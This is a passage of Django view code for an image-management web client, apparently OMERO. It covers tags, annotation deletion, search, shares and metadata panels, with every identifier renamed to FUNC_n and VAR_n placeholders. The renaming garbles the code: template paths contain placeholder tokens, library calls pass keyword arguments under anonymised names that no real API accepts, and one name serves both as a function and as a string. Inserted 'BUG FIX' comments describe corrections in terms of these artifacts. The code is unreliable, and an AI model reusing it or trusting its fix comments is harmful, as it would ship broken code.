        return FUNC_31(VAR_2, VAR_6, **VAR_7)
def FUNC_30(VAR_2, VAR_6=None, **VAR_7):
    """GET handler: JSON of tags and, when a tag id is given, the objects
    tagged with it."""
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_20 = FUNC_0(VAR_2, "group", -1)
        VAR_259 = FUNC_0(VAR_2, "id", None)
        VAR_11 = FUNC_0(VAR_2, "experimenter_id", -1)
        VAR_247 = FUNC_3(VAR_2, "orphaned", False)
        VAR_248 = FUNC_3(VAR_2, "sizeXYZ", False)
        VAR_250 = FUNC_3(VAR_2, "date", False)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    try:
        # BUG FIX: keyword values in both tree.marshal_* calls referenced
        # undefined names (conn, tag_id, ...); pass this function's locals.
        if VAR_259 is not None:
            VAR_265 = tree.marshal_tagged(
                VAR_6=VAR_6,
                VAR_11=VAR_11,
                VAR_259=VAR_259,
                VAR_20=VAR_20,
                VAR_87=VAR_87,
                VAR_248=VAR_248,
                VAR_250=VAR_250,
                VAR_88=VAR_88,
            )
        else:
            VAR_265 = {}
        VAR_265["tags"] = tree.marshal_tags(
            VAR_6=VAR_6,
            VAR_247=VAR_247,
            VAR_11=VAR_11,
            VAR_259=VAR_259,
            VAR_20=VAR_20,
            VAR_87=VAR_87,
            VAR_88=VAR_88,
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse(VAR_265)
def FUNC_31(VAR_2, VAR_6=None, **VAR_7):
    """DELETE handler: remove the annotations whose ids are in the request,
    submitted as one DoAll of /Annotation delete commands, and wait for it."""
    try:
        VAR_266 = FUNC_2(VAR_2, "id")
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    VAR_83 = list()
    VAR_84 = None
    try:
        for VAR_259 in VAR_266:
            VAR_83.append(omero.cmd.Delete("/Annotation", VAR_259))
        VAR_267 = omero.cmd.DoAll()
        VAR_267.requests = VAR_83
        VAR_84 = VAR_6.c.sf.submit(VAR_267, VAR_6.SERVICE_OPTS)
        try:
            VAR_6._waitOnCmd(VAR_84)
        finally:
            VAR_84.close()  # always release the callback handle
    except CmdError as e:
        return HttpResponseBadRequest(e.message)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    # NOTE(review): JsonResponse("") with a non-dict requires safe=False in
    # Django, otherwise it raises TypeError — confirm.
    return JsonResponse("")
@login_required()
def FUNC_32(VAR_2, VAR_6=None, **VAR_7):
    """JSON: annotations (plus their experimenters) for the objects listed in
    the query string, optionally filtered by annotation type / namespace."""
    VAR_71 = VAR_2.GET
    VAR_46 = FUNC_1(VAR_2, "image")
    VAR_45 = FUNC_1(VAR_2, "dataset")
    VAR_44 = FUNC_1(VAR_2, "project")
    VAR_47 = FUNC_1(VAR_2, "screen")
    VAR_48 = FUNC_1(VAR_2, "plate")
    VAR_85 = FUNC_1(VAR_2, "acquisition")
    VAR_86 = FUNC_1(VAR_2, "well")
    VAR_87 = FUNC_0(VAR_2, "page", 1)
    VAR_88 = FUNC_0(VAR_2, "limit", VAR_1)
    VAR_89 = VAR_71.get("type", None)
    VAR_90 = VAR_71.get("ns", None)
    # BUG FIX: keyword values referenced undefined names (project_ids,
    # dataset_ids, ...); pass this function's own locals instead.
    VAR_91, VAR_92 = tree.marshal_annotations(
        VAR_6,
        VAR_44=VAR_44,
        VAR_45=VAR_45,
        VAR_46=VAR_46,
        VAR_47=VAR_47,
        VAR_48=VAR_48,
        VAR_85=VAR_85,
        VAR_86=VAR_86,
        VAR_89=VAR_89,
        VAR_90=VAR_90,
        VAR_87=VAR_87,
        VAR_88=VAR_88,
    )
    return JsonResponse({"annotations": VAR_91, "experimenters": VAR_92})
@login_required()
def FUNC_33(VAR_2, VAR_6=None, **VAR_7):
    """JSON: shares and discussions for the given member/owner, paged."""
    try:
        VAR_87 = FUNC_0(VAR_2, "page", 1)
        VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
        VAR_244 = FUNC_0(VAR_2, "member_id", -1)
        VAR_231 = FUNC_0(VAR_2, "owner_id", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    try:
        # BUG FIX: keyword values referenced undefined names, and the
        # discussions result was bound to 'discussions' but returned as the
        # undefined VAR_268 (NameError). Use consistent local names.
        VAR_112 = tree.marshal_shares(
            VAR_6=VAR_6, VAR_244=VAR_244, VAR_231=VAR_231, VAR_87=VAR_87, VAR_88=VAR_88
        )
        VAR_268 = tree.marshal_discussions(
            VAR_6=VAR_6, VAR_244=VAR_244, VAR_231=VAR_231, VAR_87=VAR_87, VAR_88=VAR_88
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"shares": VAR_112, "discussions": VAR_268})
@login_required()
@render_response()
def FUNC_34(VAR_2, VAR_18=None, VAR_19=None, VAR_6=None, **VAR_7):
    """Build the context for a container data page; for plates/acquisitions
    this adds the well-index form, pre-selected wells and the plate template."""
    VAR_93 = getIntOrDefault(VAR_2, "index", 0)
    VAR_94 = dict()
    if VAR_18 is not None:
        if VAR_19 is not None and int(VAR_19) > 0:
            VAR_94[VAR_347(VAR_18)] = VAR_241(VAR_19)
    try:
        VAR_104 = BaseContainer(VAR_6, **VAR_94)
    except AttributeError as x:
        return handlerInternalError(VAR_2, x)
    VAR_95 = None
    VAR_53 = {"manager": VAR_104, "form_well_index": VAR_95, "index": VAR_93}
    VAR_54 = None
    if "plate" in VAR_94 or "acquisition" in VAR_94:
        VAR_269 = VAR_104.getNumberOfFields()
        if VAR_269 is not None:
            VAR_95 = WellIndexForm(VAR_115={"index": VAR_93, "range": VAR_269})
            if VAR_93 == 0:
                VAR_93 = VAR_269[0]  # default to the first available field
        # ?show=well-1|well-2 pre-selects wells in the plate grid.
        VAR_59 = VAR_2.GET.get("show")
        if VAR_59 is not None:
            VAR_348 = []
            for w in VAR_59.split("|"):
                if "well-" in w:
                    VAR_348.append(w.replace("well-", ""))
            VAR_53["select_wells"] = ",".join(VAR_348)
        VAR_53["baseurl"] = VAR_352("webgateway").rstrip("/")
        VAR_53["form_well_index"] = VAR_95
        VAR_53["index"] = VAR_93
        VAR_53["thumbnails_batch"] = settings.THUMBNAILS_BATCH
        VAR_54 = "webclient/VAR_158/VAR_421.html"
        if VAR_18 == "acquisition":
            VAR_53["acquisition"] = VAR_19
    VAR_53["isLeader"] = VAR_6.isLeader()
    VAR_53["template"] = VAR_54
    return VAR_53
@login_required()
@render_response()
def FUNC_35(VAR_2, VAR_6=None, **VAR_7):
    """For the objects given in the query string, compute their owners and
    the groups that ALL owners belong to (candidate move/chgrp targets)."""
    VAR_96 = []
    VAR_97 = set()
    VAR_98 = []
    VAR_68 = {}
    VAR_77 = {}
    for VAR_215 in ("Project", "Dataset", "Image", "Screen", "Plate"):
        VAR_154 = VAR_2.GET.get(VAR_215, None)
        if VAR_154 is not None:
            for o in VAR_6.getObjects(VAR_215, VAR_154.split(",")):
                VAR_96.append(o.getDetails().owner.id.val)
                VAR_97.add(o.getDetails().group.id.val)
    VAR_96 = list(set(VAR_96))
    if len(VAR_96) == 0:
        # No objects specified: fall back to the current user.
        VAR_96 = [VAR_6.getUserId()]
    for VAR_103 in VAR_6.getObjects(
        "Experimenter", VAR_96, opts={"load_experimentergroups": True}
    ):
        VAR_270 = []
        VAR_77[VAR_103.id] = VAR_103.getFullName()
        for VAR_101 in VAR_103.copyGroupExperimenterMap():
            VAR_68[VAR_101.parent.id.val] = VAR_101.parent
            VAR_270.append(VAR_101.parent.id.val)
        VAR_98.append(set(VAR_270))
    # Groups common to every owner.
    VAR_99 = set.intersection(*VAR_98)
    VAR_100 = VAR_6.getAdminService().getSecurityRoles().userGroupId
    # BUG FIX: 'targetGroupIds' was an undefined name; the candidate set is
    # VAR_99. Remove the system 'user' group and, when all objects live in a
    # single group, that group itself (moving there would be a no-op).
    if VAR_100 in VAR_99:
        VAR_99.remove(VAR_100)
    if len(VAR_97) == 1:
        VAR_271 = VAR_97.pop()
        if VAR_271 in VAR_99:
            VAR_99.remove(VAR_271)

    def FUNC_84(VAR_101):
        # Summarise a group's permission flags for the JSON payload.
        VAR_272 = VAR_101.getDetails().permissions
        return {
            "write": VAR_272.isGroupWrite(),
            "annotate": VAR_272.isGroupAnnotate(),
            "read": VAR_272.isGroupRead(),
        }

    VAR_102 = []
    for VAR_337 in VAR_99:
        VAR_102.append(
            {"id": VAR_337, "name": VAR_68[VAR_337].name.val, "perms": FUNC_84(VAR_68[VAR_337])}
        )
    # BUG FIX: list.sort() takes the keyword 'key', not 'VAR_312'.
    VAR_102.sort(key=lambda x: x["name"])
    VAR_77 = [[VAR_415, VAR_416] for VAR_415, VAR_416 in VAR_77.items()]
    return {"owners": VAR_77, "groups": VAR_102}
@login_required()
@render_response()
def FUNC_36(VAR_2, VAR_20, VAR_21, VAR_6=None, **VAR_7):
    """Render the chgrp target tree for group VAR_20 / target type VAR_21,
    optionally restricted to one owner (?owner=...)."""
    VAR_6.SERVICE_OPTS.setOmeroGroup(int(VAR_20))
    VAR_103 = getIntOrDefault(VAR_2, "owner", None)
    VAR_104 = BaseContainer(VAR_6)
    VAR_104.listContainerHierarchy(VAR_103)
    VAR_54 = "webclient/VAR_158/chgrp_target_tree.html"
    VAR_53 = {"manager": VAR_104, "target_type": VAR_21, "template": VAR_54}
    return VAR_53
@login_required()
@render_response()
def FUNC_37(VAR_2, VAR_22=None, VAR_6=None, **VAR_7):
    """Run a search (text or advanced) and, for purely numeric queries, also
    look up objects by id across all groups."""
    VAR_104 = BaseSearch(VAR_6)
    VAR_105 = []
    VAR_71 = VAR_2.GET
    if VAR_22 is not None:
        VAR_273 = VAR_71.get("query", None)
        if VAR_273 is None:
            return HttpResponse("No search '?query' included")
        # BUG FIX: 'query_search' was an undefined name; normalise '+' to
        # spaces in the query string itself.
        VAR_273 = VAR_273.replace("+", " ")
        VAR_274 = toBoolean(VAR_71.get("advanced"))
        if VAR_274:
            VAR_273 = VAR_71.get("advanced_search")
        VAR_54 = "webclient/search/search_details.html"
        VAR_275 = VAR_71.getlist("datatype")
        VAR_269 = VAR_71.getlist("field")
        VAR_276 = VAR_71.get("searchGroup", None)
        VAR_277 = VAR_71.get("ownedBy", None)
        VAR_278 = toBoolean(VAR_71.get("useAcquisitionDate"))
        VAR_279 = VAR_71.get("startdateinput", None)
        VAR_279 = VAR_279 is not None and smart_str(VAR_279) or None
        VAR_280 = VAR_71.get("enddateinput", None)
        VAR_280 = VAR_280 is not None and smart_str(VAR_280) or None
        VAR_250 = None
        if VAR_279 is not None:
            if VAR_280 is None:
                # Open-ended range: default the end date to today.
                VAR_390 = datetime.datetime.now()
                VAR_280 = "%s-%02d-%02d" % (VAR_390.year, VAR_390.month, VAR_390.day)
            VAR_250 = "%s_%s" % (VAR_279, VAR_280)
        if len(VAR_275) == 0:
            VAR_275 = ["images"]
        VAR_104.search(
            VAR_273,
            VAR_275,
            VAR_269,
            VAR_276,
            VAR_277,
            VAR_278,
            VAR_250,
            rawQuery=VAR_274,
        )
        # BUG FIX: r"^[\VAR_364 ,]+$" is an invalid regex escape; the intent
        # is to detect queries of only digits, spaces and commas (id search).
        VAR_281 = re.compile(r"^[\d ,]+$")
        if VAR_281.search(VAR_273) is not None:
            # Cross-group lookup of each unique numeric id per datatype.
            VAR_6.SERVICE_OPTS.setOmeroGroup(-1)
            VAR_349 = set()
            for queryId in re.split(" |,", VAR_273):
                if len(queryId) == 0:
                    continue
                try:
                    VAR_423 = VAR_241(queryId)
                    if VAR_423 in VAR_349:
                        continue
                    VAR_349.add(VAR_423)
                    for VAR_433 in VAR_275:
                        VAR_433 = VAR_433[0:-1]  # strip plural 's'
                        if VAR_433 in (
                            "project",
                            "dataset",
                            "image",
                            "screen",
                            "plate",
                            "well",
                        ):
                            VAR_38 = VAR_6.getObject(VAR_433, VAR_423)
                            if VAR_38 is not None:
                                VAR_105.append({"otype": VAR_433, "obj": VAR_38})
                except ValueError:
                    pass
    else:
        VAR_54 = "webclient/search/search.html"
    VAR_53 = {
        "manager": VAR_104,
        "foundById": VAR_105,
        "resultCount": VAR_104.c_size + len(VAR_105),
    }
    VAR_53["template"] = VAR_54
    VAR_53["thumbnails_batch"] = settings.THUMBNAILS_BATCH
    return VAR_53
@login_required()
@render_response()
def FUNC_38(VAR_2, VAR_23, VAR_24, VAR_6=None, VAR_25=None, **VAR_7):
    """Build the context for the 'General' metadata panel of one object
    (or a share/discussion), including the batch-annotate selection dict."""
    VAR_93 = getIntOrDefault(VAR_2, "index", 0)
    VAR_53 = dict()
    # Load the object into the matching bucket; every other bucket is empty.
    VAR_106 = VAR_23 == "image" and list(VAR_6.getObjects("Image", [VAR_24])) or list()
    VAR_107 = (
        VAR_23 == "dataset" and list(VAR_6.getObjects("Dataset", [VAR_24])) or list()
    )
    VAR_108 = (
        VAR_23 == "project" and list(VAR_6.getObjects("Project", [VAR_24])) or list()
    )
    VAR_109 = VAR_23 == "screen" and list(VAR_6.getObjects("Screen", [VAR_24])) or list()
    VAR_110 = VAR_23 == "plate" and list(VAR_6.getObjects("Plate", [VAR_24])) or list()
    VAR_111 = (
        VAR_23 == "acquisition"
        and list(VAR_6.getObjects("PlateAcquisition", [VAR_24]))
        or list()
    )
    VAR_112 = (
        (VAR_23 == "share" or VAR_23 == "discussion")
        and [VAR_6.getShare(VAR_24)]
        or list()
    )
    VAR_113 = VAR_23 == "well" and list(VAR_6.getObjects("Well", [VAR_24])) or list()
    VAR_114 = {
        "images": VAR_23 == "image" and [VAR_24] or [],
        "datasets": VAR_23 == "dataset" and [VAR_24] or [],
        "projects": VAR_23 == "project" and [VAR_24] or [],
        "screens": VAR_23 == "screen" and [VAR_24] or [],
        "plates": VAR_23 == "plate" and [VAR_24] or [],
        "acquisitions": VAR_23 == "acquisition" and [VAR_24] or [],
        "wells": VAR_23 == "well" and [VAR_24] or [],
        "shares": ((VAR_23 == "share" or VAR_23 == "discussion") and [VAR_24] or []),
    }
    VAR_115 = {
        "selected": VAR_114,
        "images": VAR_106,
        "datasets": VAR_107,
        "projects": VAR_108,
        "screens": VAR_109,
        "plates": VAR_110,
        "acquisitions": VAR_111,
        "wells": VAR_113,
        "shares": VAR_112,
    }
    VAR_116 = None
    VAR_117 = None
    if VAR_23 in ("share", "discussion"):
        VAR_54 = "webclient/annotations/annotations_share.html"
        VAR_104 = BaseShare(VAR_6, VAR_24)
        VAR_104.getAllUsers(VAR_24)
        VAR_104.getComments(VAR_24)
        # BUG FIX: 'initial' was an undefined name; the form's initial data
        # is the VAR_115 dict assembled above.
        VAR_116 = CommentAnnotationForm(VAR_115=VAR_115)
    else:
        try:
            VAR_104 = BaseContainer(VAR_6, **{VAR_347(VAR_23): VAR_241(VAR_24), "index": VAR_93})
        except AttributeError as x:
            return handlerInternalError(VAR_2, x)
        if VAR_25 is not None:
            VAR_54 = "webclient/annotations/annotations_share.html"
            VAR_53["share"] = BaseShare(VAR_6, VAR_25)
        else:
            VAR_54 = "webclient/annotations/metadata_general.html"
            VAR_53["canExportAsJpg"] = VAR_104.canExportAsJpg(VAR_2)
            VAR_53["annotationCounts"] = VAR_104.getAnnotationCounts()
            VAR_117 = VAR_104.listFigureScripts()
    VAR_53["manager"] = VAR_104
    if VAR_23 in ("tag", "tagset"):
        VAR_53["insight_ns"] = omero.rtypes.rstring(
            omero.constants.metadata.NSINSIGHTTAGSET
        ).val
    if VAR_116 is not None:
        VAR_53["form_comment"] = VAR_116
    VAR_53["figScripts"] = VAR_117
    VAR_53["template"] = VAR_54
    VAR_53["webclient_path"] = VAR_352("webindex")
    return VAR_53
@login_required()
@render_response()
def FUNC_39(VAR_2, VAR_23, VAR_24, VAR_6=None, VAR_25=None, **VAR_7):
    """Build the 'preview' metadata panel context for one object.

    Loads all rendering definitions for the object's image, keeps the most
    recent rdef per owner, marks the current one, and returns the template
    context dict (rendered by @render_response).
    """
    VAR_53 = {}
    VAR_93 = getIntOrDefault(VAR_2, "index", 0)
    VAR_104 = BaseContainer(VAR_6, **{VAR_347(VAR_23): VAR_241(VAR_24)})
    if VAR_25:
        VAR_53["share"] = BaseShare(VAR_6, VAR_25)
    if VAR_23 == "well":
        # For a well, preview the image at the requested well-sample index.
        VAR_104.image = VAR_104.well.getImage(VAR_93)
    VAR_118 = VAR_104.image.getAllRenderingDefs()
    VAR_119 = {}
    VAR_120 = VAR_104.image.getRenderingDefId()
    for VAR_71 in VAR_118:
        VAR_229 = VAR_71["owner"]["id"]
        VAR_71["current"] = VAR_71["id"] == VAR_120
        # Keep only the newest (highest id) rdef per owner.
        if VAR_229 not in VAR_119 or VAR_119[VAR_229]["id"] < VAR_71["id"]:
            VAR_119[VAR_229] = VAR_71
    # BUG FIX: was "rdefs.values()" — a NameError, since the local dict is
    # VAR_119. Collapse the per-owner dict to its values.
    VAR_119 = VAR_119.values()
    VAR_121 = []
    for VAR_71 in VAR_119:
        VAR_282 = []
        for VAR_320, VAR_383 in enumerate(VAR_71["c"]):
            # Build the compact channel string, e.g. "-1|0:255r$FF0000"
            VAR_350 = "-"
            if VAR_383["active"]:
                VAR_350 = ""
            VAR_351 = VAR_383["lut"] if "lut" in VAR_383 else VAR_383["color"]
            VAR_352 = "r" if VAR_383["inverted"] else "-r"
            VAR_282.append(
                "%s%s|%s:%s%s$%s" % (VAR_350, VAR_320 + 1, VAR_383["start"], VAR_383["end"], VAR_352, VAR_351)
            )
        VAR_121.append(
            {
                "id": VAR_71["id"],
                "owner": VAR_71["owner"],
                "c": ",".join(VAR_282),
                "m": VAR_71["model"] == "greyscale" and "g" or "c",
            }
        )
    VAR_122, VAR_123 = VAR_6.getMaxPlaneSize()
    VAR_124 = VAR_104.image.getSizeX()
    VAR_125 = VAR_104.image.getSizeY()
    # Images larger than the max plane size are rendered tiled.
    VAR_53["tiledImage"] = (VAR_124 * VAR_125) > (VAR_122 * VAR_123)
    VAR_53["manager"] = VAR_104
    VAR_53["rdefsJson"] = json.dumps(VAR_121)
    VAR_53["rdefs"] = VAR_119
    VAR_53["template"] = "webclient/annotations/metadata_preview.html"
    return VAR_53
@login_required()
@render_response()
def FUNC_40(VAR_2, VAR_23, VAR_24, VAR_6=None, **VAR_7):
    """Build the 'hierarchy' metadata panel context for one object."""
    manager_kwargs = {VAR_347(VAR_23): VAR_241(VAR_24)}
    manager = BaseContainer(VAR_6, **manager_kwargs)
    return {
        "manager": manager,
        "template": "webclient/annotations/metadata_hierarchy.html",
    }
@login_required()
@render_response()
def FUNC_41(
    VAR_2, VAR_23, VAR_24, VAR_6=None, VAR_25=None, **VAR_7
):
    """Build the 'acquisition' metadata panel context for one object.

    For images this assembles per-channel forms (light path, detector and
    light-source settings, plane timing info) plus instrument-level forms
    (microscope, objectives, filters, dichroics, detectors, lasers).
    Shares/discussions get the share-annotations template instead.
    """
    try:
        if VAR_23 in ("share", "discussion"):
            VAR_54 = "webclient/annotations/annotations_share.html"
            VAR_104 = BaseShare(VAR_6, VAR_24)
            VAR_104.getAllUsers(VAR_24)
            VAR_104.getComments(VAR_24)
        else:
            VAR_54 = "webclient/annotations/metadata_acquisition.html"
            VAR_104 = BaseContainer(VAR_6, **{VAR_347(VAR_23): VAR_241(VAR_24)})
    except AttributeError as x:
        return handlerInternalError(VAR_2, x)
    # Forms for the various acquisition components; None / empty until filled.
    VAR_126 = None
    VAR_127 = None
    VAR_128 = None
    VAR_129 = list()
    VAR_130 = None
    VAR_131 = list()
    VAR_132 = list()
    VAR_133 = list()
    VAR_134 = list()
    VAR_135 = list()
    VAR_136 = list(VAR_6.getEnumerationEntries("LaserType"))
    VAR_137 = list(VAR_6.getEnumerationEntries("ArcType"))
    VAR_138 = list(VAR_6.getEnumerationEntries("FilamentType"))
    # Enumerations loaded lazily below, only when first needed.
    VAR_139 = None
    VAR_140 = None
    VAR_141 = None
    if VAR_23 == "image":
        if VAR_25 is None:
            VAR_104.companionFiles()
        VAR_104.channelMetadata()
        for theC, ch in enumerate(VAR_104.channel_metadata):
            VAR_353 = ch.getLogicalChannel()
            if VAR_353 is not None:
                VAR_391 = dict()
                VAR_391["form"] = MetadataChannelForm(
                    VAR_115={
                        "logicalChannel": VAR_353,
                        "exWave": ch.getExcitationWave(units=True),
                        "emWave": ch.getEmissionWave(units=True),
                        "illuminations": list(
                            VAR_6.getEnumerationEntries("IlluminationI")
                        ),
                        "contrastMethods": list(
                            VAR_6.getEnumerationEntries("ContrastMethodI")
                        ),
                        "modes": list(VAR_6.getEnumerationEntries("AcquisitionModeI")),
                    },
                    auto_id=False,
                )
                if VAR_25 is None:
                    # Light path (filters/dichroic) is not shown in shares.
                    VAR_424 = VAR_353.getLightPath()
                    if VAR_424 is not None:
                        VAR_391["form_dichroic"] = None
                        VAR_391["form_excitation_filters"] = list()
                        VAR_391["form_emission_filters"] = list()
                        VAR_434 = VAR_424.getDichroic()
                        if VAR_434 is not None:
                            VAR_391["form_dichroic"] = MetadataDichroicForm(
                                VAR_115={"dichroic": VAR_434}
                            )
                        VAR_435 = list(VAR_6.getEnumerationEntries("FilterTypeI"))
                        for f in VAR_424.getEmissionFilters():
                            VAR_391["form_emission_filters"].append(
                                MetadataFilterForm(
                                    VAR_115={"filter": f, "types": VAR_435}
                                )
                            )
                        for f in VAR_424.getExcitationFilters():
                            VAR_391["form_excitation_filters"].append(
                                MetadataFilterForm(
                                    VAR_115={"filter": f, "types": VAR_435}
                                )
                            )
                    VAR_425 = VAR_353.getDetectorSettings()
                    if (
                        VAR_425._obj is not None
                        and VAR_425.getDetector()
                    ):
                        VAR_391["form_detector_settings"] = MetadataDetectorForm(
                            VAR_115={
                                "detectorSettings": VAR_425,
                                "detector": VAR_425.getDetector(),
                                "types": list(
                                    VAR_6.getEnumerationEntries("DetectorTypeI")
                                ),
                                "binnings": list(VAR_6.getEnumerationEntries("Binning")),
                            }
                        )
                    VAR_426 = VAR_353.getLightSourceSettings()
                    if (
                        VAR_426 is not None
                        and VAR_426._obj is not None
                    ):
                        VAR_436 = VAR_426.getLightSource()
                        if VAR_436 is not None:
                            # Pick the enumeration matching the light source class.
                            VAR_439 = VAR_136
                            if VAR_436.OMERO_CLASS == "Arc":
                                VAR_439 = VAR_137
                            elif VAR_436.OMERO_CLASS == "Filament":
                                VAR_439 = VAR_138
                            VAR_391["form_light_source"] = MetadataLightSourceForm(
                                VAR_115={
                                    "lightSource": VAR_436,
                                    "lightSourceSettings": VAR_426,
                                    "lstypes": VAR_439,
                                    "mediums": list(
                                        VAR_6.getEnumerationEntries("LaserMediumI")
                                    ),
                                    "pulses": list(
                                        VAR_6.getEnumerationEntries("PulseI")
                                    ),
                                }
                            )
                VAR_391["label"] = ch.getLabel()
                VAR_351 = ch.getColor()
                VAR_391["color"] = VAR_351 is not None and VAR_351.getHtml() or None
                VAR_392 = (
                    VAR_104.image
                    and VAR_104.image.getPrimaryPixels().copyPlaneInfo(
                        theC=theC, theZ=0
                    )
                )
                VAR_393 = []
                for pi in VAR_392:
                    VAR_427 = pi.getDeltaT(units="SECOND")
                    VAR_428 = pi.getExposureTime(units="SECOND")
                    if VAR_427 is None and VAR_428 is None:
                        continue
                    if VAR_427 is not None:
                        # BUG FIX: was "deltaT.getValue()" — NameError; the
                        # local is VAR_427.
                        VAR_427 = VAR_427.getValue()
                    if VAR_428 is not None:
                        # BUG FIX: was "exposure.getValue()" — NameError; the
                        # local is VAR_428.
                        VAR_428 = VAR_428.getValue()
                    VAR_393.append(
                        {"theT": pi.theT, "deltaT": VAR_427, "exposureTime": VAR_428}
                    )
                VAR_391["plane_info"] = VAR_393
                VAR_134.append(VAR_391)
        try:
            VAR_142 = VAR_104.well.getWellSample().image()
        except Exception:
            VAR_142 = VAR_104.image
        if VAR_25 is None:  # 9853
            if VAR_142.getObjectiveSettings() is not None:
                # Load enumerations once, on first use.
                if VAR_139 is None:
                    VAR_139 = list(VAR_6.getEnumerationEntries("MediumI"))
                if VAR_140 is None:
                    VAR_140 = list(VAR_6.getEnumerationEntries("ImmersionI"))
                if VAR_141 is None:
                    VAR_141 = list(VAR_6.getEnumerationEntries("CorrectionI"))
                VAR_127 = MetadataObjectiveSettingsForm(
                    VAR_115={
                        "objectiveSettings": VAR_142.getObjectiveSettings(),
                        "objective": VAR_142.getObjectiveSettings().getObjective(),
                        "mediums": VAR_139,
                        "immersions": VAR_140,
                        "corrections": VAR_141,
                    }
                )
            if VAR_142.getImagingEnvironment() is not None:
                VAR_126 = MetadataEnvironmentForm(VAR_115={"image": VAR_142})
            if VAR_142.getStageLabel() is not None:
                VAR_130 = MetadataStageLabelForm(VAR_115={"image": VAR_142})
            VAR_354 = VAR_142.getInstrument()
            if VAR_354 is not None:
                if VAR_354.getMicroscope() is not None:
                    VAR_128 = MetadataMicroscopeForm(
                        VAR_115={
                            "microscopeTypes": list(
                                VAR_6.getEnumerationEntries("MicroscopeTypeI")
                            ),
                            "microscope": VAR_354.getMicroscope(),
                        }
                    )
                VAR_394 = VAR_354.getObjectives()
                for o in VAR_394:
                    if VAR_139 is None:
                        VAR_139 = list(VAR_6.getEnumerationEntries("MediumI"))
                    if VAR_140 is None:
                        VAR_140 = list(VAR_6.getEnumerationEntries("ImmersionI"))
                    if VAR_141 is None:
                        VAR_141 = list(VAR_6.getEnumerationEntries("CorrectionI"))
                    VAR_429 = MetadataObjectiveForm(
                        VAR_115={
                            "objective": o,
                            "mediums": VAR_139,
                            "immersions": VAR_140,
                            "corrections": VAR_141,
                        },
                        auto_id=False,
                    )
                    VAR_129.append(VAR_429)
                VAR_395 = list(VAR_354.getFilters())
                if len(VAR_395) > 0:
                    for f in VAR_395:
                        VAR_437 = MetadataFilterForm(
                            VAR_115={
                                "filter": f,
                                "types": list(
                                    VAR_6.getEnumerationEntries("FilterTypeI")
                                ),
                            },
                            auto_id=False,
                        )
                        VAR_131.append(VAR_437)
                VAR_396 = list(VAR_354.getDichroics())
                for VAR_364 in VAR_396:
                    VAR_430 = MetadataDichroicForm(
                        VAR_115={"dichroic": VAR_364}, auto_id=False
                    )
                    VAR_132.append(VAR_430)
                VAR_397 = list(VAR_354.getDetectors())
                if len(VAR_397) > 0:
                    for VAR_364 in VAR_397:
                        VAR_438 = MetadataDetectorForm(
                            VAR_115={
                                "detectorSettings": None,
                                "detector": VAR_364,
                                "types": list(
                                    VAR_6.getEnumerationEntries("DetectorTypeI")
                                ),
                            },
                            auto_id=False,
                        )
                        VAR_133.append(VAR_438)
                VAR_398 = list(VAR_354.getLightSources())
                if len(VAR_398) > 0:
                    for laser in VAR_398:
                        VAR_439 = VAR_136
                        if laser.OMERO_CLASS == "Arc":
                            VAR_439 = VAR_137
                        elif laser.OMERO_CLASS == "Filament":
                            VAR_439 = VAR_138
                        VAR_440 = MetadataLightSourceForm(
                            VAR_115={
                                "lightSource": laser,
                                "lstypes": VAR_439,
                                "mediums": list(
                                    VAR_6.getEnumerationEntries("LaserMediumI")
                                ),
                                "pulses": list(VAR_6.getEnumerationEntries("PulseI")),
                            },
                            auto_id=False,
                        )
                        VAR_135.append(VAR_440)
    VAR_53 = {"manager": VAR_104, "share_id": VAR_25}
    if VAR_23 not in ("share", "discussion", "tag"):
        VAR_53["form_channels"] = VAR_134
        VAR_53["form_environment"] = VAR_126
        VAR_53["form_objective"] = VAR_127
        VAR_53["form_microscope"] = VAR_128
        VAR_53["form_instrument_objectives"] = VAR_129
        VAR_53["form_filters"] = VAR_131
        VAR_53["form_dichroics"] = VAR_132
        VAR_53["form_detectors"] = VAR_133
        VAR_53["form_lasers"] = VAR_135
        VAR_53["form_stageLabel"] = VAR_130
    VAR_53["template"] = VAR_54
    return VAR_53
@login_required()
@render_response()
def FUNC_42(VAR_2, VAR_26, VAR_6=None, VAR_25=None, **VAR_7):
    """Build the 'original metadata' panel context for an image.

    Returns 408 if the metadata file is locked by another process.
    """
    image = VAR_6.getObject("Image", VAR_26)
    if image is None:
        raise Http404("No Image found with ID %s" % VAR_26)
    ctx = {
        "template": "webclient/annotations/original_metadata.html",
        "imageId": image.getId(),
    }
    try:
        metadata = image.loadOriginalMetadata()
        if metadata is not None:
            for key, idx in (
                ("original_metadata", 0),
                ("global_metadata", 1),
                ("series_metadata", 2),
            ):
                ctx[key] = metadata[idx]
    except omero.LockTimeout:
        return HttpResponse(VAR_286="LockTimeout", VAR_315=408)
    return ctx
def FUNC_43(VAR_2, VAR_6=None):
    """Resolve object ids posted/queried in the request into loaded objects.

    Reads id lists from request.GET (falling back to POST) and returns a
    dict mapping each supported datatype key to a list of objects loaded
    via the gateway (empty list when no ids of that type were supplied).
    Only the first "share" id is honoured.
    """
    params = VAR_2.GET or VAR_2.POST
    result = {}
    for key, omero_type in (
        ("image", "Image"),
        ("dataset", "Dataset"),
        ("project", "Project"),
        ("screen", "Screen"),
        ("plate", "Plate"),
        ("acquisition", "PlateAcquisition"),
        ("well", "Well"),
    ):
        ids = params.getlist(key)
        result[key] = list(VAR_6.getObjects(omero_type, ids)) if ids else list()
    share_ids = params.getlist("share")
    result["share"] = [VAR_6.getShare(share_ids[0])] if share_ids else list()
    return result
def FUNC_44(VAR_2):
    """Return the raw id lists from the request, keyed by plural datatype."""
    params = VAR_2.GET or VAR_2.POST
    key_map = (
        ("image", "images"),
        ("dataset", "datasets"),
        ("project", "projects"),
        ("screen", "screens"),
        ("plate", "plates"),
